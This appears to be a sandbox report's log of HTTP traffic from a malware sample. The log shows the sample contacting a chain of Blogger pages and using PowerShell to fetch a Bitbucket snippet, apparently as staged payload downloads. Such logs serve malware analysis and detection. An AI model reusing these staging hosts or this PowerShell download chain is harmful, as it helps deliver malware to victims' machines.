                      Source: global trafficHTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: johonathahogyaabagebarhomeintum.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.com
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.com
                      Source: global trafficHTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.833016469.1631746236; _gid=GA1.2.19021443.1631746236
                      Source: global trafficHTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:c9BBumwINGgbKZmhvCsmcJwIqGnQ7A:dvQQZbHicFDLQc5k
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:6n9HeR7EpH_BLBfBK28oPhchLN3ckw:TftEdtH5NeRlJzNf
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:-UtK03aR6xcHYC2IsubUGy9SL5c4yw:nFWAkb4XQpFiUmZt
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:5Vg_RjDpt6AvPfyva6KZpJ4lF9qr6w:sp4m46I6qe_hSWA8
